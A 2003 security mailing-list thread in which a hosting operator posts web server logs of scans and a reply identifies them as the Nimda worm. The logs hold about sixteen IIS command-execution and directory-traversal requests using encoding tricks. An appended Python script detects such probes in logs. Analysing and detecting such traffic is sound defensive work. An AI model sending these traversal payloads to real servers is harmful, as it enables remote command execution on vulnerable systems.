Re: Anyone know this tool?
From: Jason Falciola (falciola_at_us.ibm.com)
Date: 07/29/03
- Previous message: James Williams: "RE: Anyone know this tool?"
- Maybe in reply to: Danny: "Anyone know this tool?"
- Next in thread: Danny: "Re: Anyone know this tool?"
- Reply: Danny: "Re: Anyone know this tool?"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: Danny <danny@eboundary.com>
Date: Tue, 29 Jul 2003 12:57:16 -0400
Looks like plain old Nimda to me. Someone please correct me if I'm
missing something obvious.
<http://www.cert.org/advisories/CA-2001-26.html>
Jason Falciola
Security Intelligence Analyst
IBM Managed Security Services
falciola@us.ibm.com
Danny <danny@eboundary.com>
07/28/2003 11:24 PM
To: incidents@securityfocus.com
cc:
Subject: Anyone know this tool?
Does anyone happen to know what tool this is? I've seen the exact same
scans on 6 of our servers on completely different networks. All the
scans have been from different source IPs and all the servers were hit
within a space of a few hours.
Curiosity is getting the better of me since I've never seen this exact
pattern before :)
64.180.241.204 - - [28/Jul/2003:22:18:39 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:39 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:43 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
Danny
Work - http://www.eBoundary.com - Secure, FreeBSD hosting.
Play - http://www.eBoundary.net - Who really sets your electronic
boundaries?
AIM: eBoundaryTch | ICQ: 3090141
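
One way to triage access-log probes like the ones quoted above, as an added example that is not part of the original thread: it decodes each request target once and tags the traits the posted requests share (root.exe or cmd.exe in the path, escapes that survive one decoding pass, 0xC0/0xC1 bytes), then reports per source whether any probe was not rejected. The sample lines are constructed from request paths in the post with documentation-range source addresses; `classify`, `scan` and the tag names are chosen for this example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_to_bytes

# Constructed sample: request paths as quoted in the post, documentation-range
# source addresses, plus one benign request for contrast.
SAMPLE_LOG = r'''
192.0.2.10 - - [28/Jul/2003:22:18:39 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"
192.0.2.10 - - [28/Jul/2003:22:18:40 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
192.0.2.10 - - [28/Jul/2003:22:18:41 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
192.0.2.10 - - [28/Jul/2003:22:18:42 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 - "-" "-"
192.0.2.77 - - [28/Jul/2003:22:19:02 -0500] "GET /index.html HTTP/1.0" 200 1043 "-" "-"
'''

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) ')
RESIDUAL_ESCAPE = re.compile(rb'%[0-9a-fA-F]{2}')

def classify(target):
    """Return the set of probe traits found in one request target."""
    decoded = unquote_to_bytes(target).lower()    # one decoding pass only
    tags = set()
    if b'/root.exe' in decoded:
        tags.add('root.exe')
    if b'cmd.exe' in decoded:
        tags.add('cmd.exe')
    if RESIDUAL_ESCAPE.search(decoded):           # %255c -> %5c: encoded twice
        tags.add('double-encoding')
    if b'\xc0' in decoded or b'\xc1' in decoded:  # lead bytes never valid in UTF-8
        tags.add('overlong-utf8')
    return tags

def scan(log_text):
    """Group probe traits per source; list probes the server did not reject."""
    report = defaultdict(lambda: {'tags': set(), 'hits': 0, 'not_rejected': []})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        tags = classify(m.group(2)) if m else set()
        if not tags:
            continue
        src, target, status = m.group(1), m.group(2), int(m.group(3))
        entry = report[src]
        entry['tags'] |= tags
        entry['hits'] += 1
        if status < 400:                          # anything but 4xx/5xx needs triage
            entry['not_rejected'].append(target)
    return dict(report)

if __name__ == '__main__':
    print(scan(SAMPLE_LOG))
```

An empty `not_rejected` list, as with the 404 and 400 responses in the post, means every probe from that source failed; any entry there is the request to investigate first.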